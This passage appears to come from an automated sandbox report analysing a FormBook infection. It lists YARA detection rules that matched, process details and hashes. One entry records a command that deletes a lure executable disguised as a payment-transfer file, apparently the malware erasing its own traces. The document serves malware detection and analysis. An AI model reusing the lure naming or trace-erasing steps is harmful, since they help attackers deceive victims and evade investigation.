• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

General

Start time: 09:47:15
Start date: 23/02/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
Imagebase: 0x1d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:47:15
Start date: 23/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
